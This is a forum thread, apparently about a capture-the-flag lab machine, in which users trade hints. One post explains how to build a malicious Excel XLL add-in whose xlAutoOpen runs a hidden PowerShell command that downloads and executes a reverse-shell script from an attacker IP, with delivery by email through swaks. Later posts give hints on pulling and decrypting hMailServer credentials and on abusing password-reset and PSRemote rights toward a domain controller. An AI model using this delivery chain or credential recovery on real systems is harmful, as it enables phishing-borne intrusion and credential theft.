[xxxbfacc]

xll is just a dll... fml

[Greder]

someone helpe me how i create a xll archive

[bmoon10]

well here are  other pointers on building a xll file

https://whichbuffer.medium.com/macro-4-0...3c3a0fa697
https://github.com/moohax/xllpoc

 u explain how to get xll from this i can't understand

https://github.com/edparcell/HelloWorldXll


1.you need visual studio dev environment to build the xll file

2.download the excel 2013 sdk from ms website

3.open the HelloWorldXll project in visual c++.

4.change the project properties to include header, library directory from excel 2013 sdk directory and update the excel sdk library file name in the Linker section

5.add the reverse shell download code something like the one given below in the xlAutoOpen function
 - system("powershell -ep bypass -w hidden -Command iex(New-Object Net.WebClient).DownloadString('IP:<PORT>/revsh.ps1'))");
 - Replace the IP, PORT with you IP, PORT

6.build the project for x64 target

7.use the xll with swaks

[bmoon10]

well here are  other pointers on building a xll file

https://whichbuffer.medium.com/macro-4-0...3c3a0fa697
https://github.com/moohax/xllpoc

Im using VS 2022 and is full of errors, do I need to install the VS 2015?

i'm able to build the xll from https://github.com/edparcell/HelloWorldXll/tree/master using VS 2022.
download the excel 2013 sdk and change the project to use this.
good luck

[jeff1998]

Any hints for low user?

From bloodhound, this is the result.
Member of Web Devs has priv to reset App Devs member password. And App Devs member has PSRemote Priv to DC. So maybe from gideon.hamill we need to pwn users from Web Devs.

don't know what to do next. lol

[standby123]

Any hints for low user?

From bloodhound, this is the result.
Member of Web Devs has priv to reset App Devs member password. And App Devs member has PSRemote Priv to DC. So maybe from gideon.hamill we need to pwn users from Web Devs.

don't know what to do next. lol

Search in the folder C:\Program Files (x86)\hMailServer

[osamy7593]

guys what payload works in rev.ps1 ? no one works for me

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[saoBFo]

Any hints for low user?

From bloodhound, this is the result.
Member of Web Devs has priv to reset App Devs member password. And App Devs member has PSRemote Priv to DC. So maybe from gideon.hamill we need to pwn users from Web Devs.

don't know what to do next. lol

Search in the folder C:\Program Files (x86)\hMailServer

The hash in the hMailServer.INI is not crackable with rockyou

[markg34]

Any hints for low user?

From bloodhound, this is the result.
Member of Web Devs has priv to reset App Devs member password. And App Devs member has PSRemote Priv to DC. So maybe from gideon.hamill we need to pwn users from Web Devs.

don't know what to do next. lol

Search in the folder C:\Program Files (x86)\hMailServer

The hash in the hMailServer.INI is not crackable with rockyou

Yeah hmailer theres a decrpyt vbs in addons you can use, I modified it and decrypted the pass from the INI

[standby123]

Any hints for low user?

From bloodhound, this is the result.
Member of Web Devs has priv to reset App Devs member password. And App Devs member has PSRemote Priv to DC. So maybe from gideon.hamill we need to pwn users from Web Devs.

don't know what to do next. lol

Search in the folder C:\Program Files (x86)\hMailServer

The hash in the hMailServer.INI is not crackable with rockyou

Hash what hash? search in C:\Program Files (x86)\hMailServer\Data